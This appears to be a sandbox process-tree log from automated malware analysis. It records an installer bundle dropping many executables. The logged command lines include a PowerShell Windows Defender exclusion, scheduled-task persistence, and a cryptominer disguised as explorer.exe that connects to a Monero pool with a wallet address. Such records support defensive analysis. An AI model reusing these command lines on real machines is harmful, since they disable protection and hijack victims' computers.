PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1468	1864	setup_install.exe	cmd.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 360 wrote to memory of 764	360	cmd.exe	powershell.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1156	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 616	1864	setup_install.exe	cmd.exe
PID 1864 wrote to memory of 1552	1864	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1100

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1296

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS01522F12\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
4⤵
- Loads dropped DLL
PID:108

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1917b8fb5f09db8.exe
Sun1917b8fb5f09db8.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
4⤵
- Loads dropped DLL
PID:1156

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19e4ade31b2a.exe
Sun19e4ade31b2a.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
4⤵
- Loads dropped DLL
PID:1468

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun193fda712d9f1.exe
Sun193fda712d9f1.exe
5⤵
- Executes dropped EXE
PID:1676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
4⤵
- Loads dropped DLL
PID:1472

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19262b9e49ad.exe
Sun19262b9e49ad.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:2084

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
4⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19de8ff4b6aefeb8.exe
Sun19de8ff4b6aefeb8.exe /mixone
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\59768322479.exe"
6⤵
PID:1840

C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\59768322479.exe
"C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\59768322479.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe" /mix
6⤵
PID:3116

C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe
"C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe" /mix
7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3332

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\PhmFacly & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\20868724921.exe"
8⤵
PID:3524

C:\Windows\SysWOW64\timeout.exe
timeout 4
9⤵
- Delays execution with timeout.exe
PID:3592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\90465974774.exe" /mix
6⤵
PID:3252

C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\90465974774.exe
"C:\Users\Admin\AppData\Local\Temp\{GVZR-hDD7T-MW39-sTzx4}\90465974774.exe" /mix
7⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3400

C:\Users\Admin\AppData\Roaming\sliders\apinesp.exe
apinesp.exe
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
6⤵
PID:3380

C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3532

C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
"C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19de8ff4b6aefeb8.exe" & exit
6⤵
PID:3472

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sun19de8ff4b6aefeb8.exe" /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
4⤵
- Loads dropped DLL
PID:2016

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun19eb40faaaa9.exe
Sun19eb40faaaa9.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 972
6⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
4⤵
- Loads dropped DLL
PID:1428

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun191101c1aaa.exe
Sun191101c1aaa.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1968

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
8⤵
PID:2380

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
9⤵
- Creates scheduled task(s)
PID:2364

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
9⤵
PID:1380

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
10⤵
- Creates scheduled task(s)
PID:1472

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
9⤵
- Executes dropped EXE
PID:2652

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2288

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
8⤵
- Executes dropped EXE
PID:2472

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1960

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\16825021799.exe"
8⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\16825021799.exe
"C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\16825021799.exe"
9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\04350976466.exe" /mix
8⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\04350976466.exe
"C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\04350976466.exe" /mix
9⤵
- Executes dropped EXE
PID:2712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\35378882040.exe" /mix
8⤵
PID:2764

C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\35378882040.exe
"C:\Users\Admin\AppData\Local\Temp\{wDZ0-EA1kT-dRpA-PuzjS}\35378882040.exe" /mix
9⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2864

C:\Users\Admin\AppData\Roaming\sliders\apinesp.exe
apinesp.exe
10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
8⤵
PID:2332

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2324

C:\Users\Admin\AppData\Local\Temp\udptest.exe
"C:\Users\Admin\AppData\Local\Temp\udptest.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Users\Admin\AppData\Local\Temp\5.exe
"C:\Users\Admin\AppData\Local\Temp\5.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2536 -s 1452
8⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2612

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2752

C:\Users\Admin\AppData\Local\Temp\is-UKH8E.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UKH8E.tmp\setup_2.tmp" /SL5="$1019C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
8⤵
- Executes dropped EXE
PID:2868

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
9⤵
- Executes dropped EXE
PID:2976

C:\Users\Admin\AppData\Local\Temp\is-3S423.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3S423.tmp\setup_2.tmp" /SL5="$201B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
10⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3036

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2800

C:\Users\Admin\AppData\Local\Temp\3002.exe
"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
8⤵
PID:2888

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
7⤵
- Executes dropped EXE
PID:2844

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
4⤵
- Loads dropped DLL
PID:616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
4⤵
- Loads dropped DLL
PID:1192

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1905815e51282417.exe
Sun1905815e51282417.exe
5⤵
- Executes dropped EXE
PID:1016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
4⤵
- Loads dropped DLL
PID:1376

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun198361825f4.exe
Sun198361825f4.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
4⤵
- Loads dropped DLL
PID:1540

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1966fb31dd5a07.exe
Sun1966fb31dd5a07.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1724

C:\Users\Admin\AppData\Local\Temp\is-EAAH0.tmp\Sun1966fb31dd5a07.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EAAH0.tmp\Sun1966fb31dd5a07.tmp" /SL5="$D0160,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1966fb31dd5a07.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1264

C:\Users\Admin\AppData\Local\Temp\is-CRDP1.tmp\Ze2ro.exe
"C:\Users\Admin\AppData\Local\Temp\is-CRDP1.tmp\Ze2ro.exe" /S /UID=burnerch2
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:2456

C:\Program Files\7-Zip\LOSLACVOIH\ultramediaburner.exe
"C:\Program Files\7-Zip\LOSLACVOIH\ultramediaburner.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:2208

C:\Users\Admin\AppData\Local\Temp\is-7AIRU.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7AIRU.tmp\ultramediaburner.tmp" /SL5="$20330,281924,62464,C:\Program Files\7-Zip\LOSLACVOIH\ultramediaburner.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2308

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
- Executes dropped EXE
PID:2144

C:\Users\Admin\AppData\Local\Temp\e4-dd61b-d50-794a3-54712ee69f005\Cepesaetozhi.exe
"C:\Users\Admin\AppData\Local\Temp\e4-dd61b-d50-794a3-54712ee69f005\Cepesaetozhi.exe"
8⤵
- Executes dropped EXE
PID:2576

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4060

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4060 CREDAT:275457 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3252

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4060 CREDAT:3552265 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2184

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4060 CREDAT:1913873 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2128

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
9⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1980

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1980 CREDAT:275457 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2256

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
9⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3200

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3200 CREDAT:275457 /prefetch:2
10⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3048

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
9⤵
PID:3812

C:\Users\Admin\AppData\Local\Temp\a8-33e47-fc8-ab3a2-aa67b63ce97bd\SHelylaewesy.exe
"C:\Users\Admin\AppData\Local\Temp\a8-33e47-fc8-ab3a2-aa67b63ce97bd\SHelylaewesy.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe /eufive & exit
9⤵
PID:2988

C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe /eufive
10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\q1k2lmot.ifs\GcleanerEU.exe" & exit
11⤵
PID:3384

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:3500

C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe
C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe /qn CAMPAIGN="654"
10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:3100

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ueetfdm4.u0a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632314385 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
11⤵
PID:3884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yh4m3mu0.bsx\anyname.exe & exit
9⤵
PID:956

C:\Users\Admin\AppData\Local\Temp\yh4m3mu0.bsx\anyname.exe
C:\Users\Admin\AppData\Local\Temp\yh4m3mu0.bsx\anyname.exe
10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe /mixfive & exit
9⤵
PID:4040

C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe /mixfive
10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xlihfugf.pxe\gcleaner.exe" & exit
11⤵
PID:3812

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0k2vsvwb.0ar\autosubplayer.exe /S & exit
9⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\0k2vsvwb.0ar\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\0k2vsvwb.0ar\autosubplayer.exe /S
10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"
11⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"
11⤵
PID:1884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"
11⤵
PID:2156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"
11⤵
PID:188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"
11⤵
PID:2416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn7E93.tmp\tempfile.ps1"
11⤵
PID:3820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
4⤵
- Loads dropped DLL
PID:1672

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun195a1614ec24e6a.exe
Sun195a1614ec24e6a.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Users\Admin\AppData\Local\Temp\7zS01522F12\Sun1908b94df837b3158.exe
Sun1908b94df837b3158.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1824

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
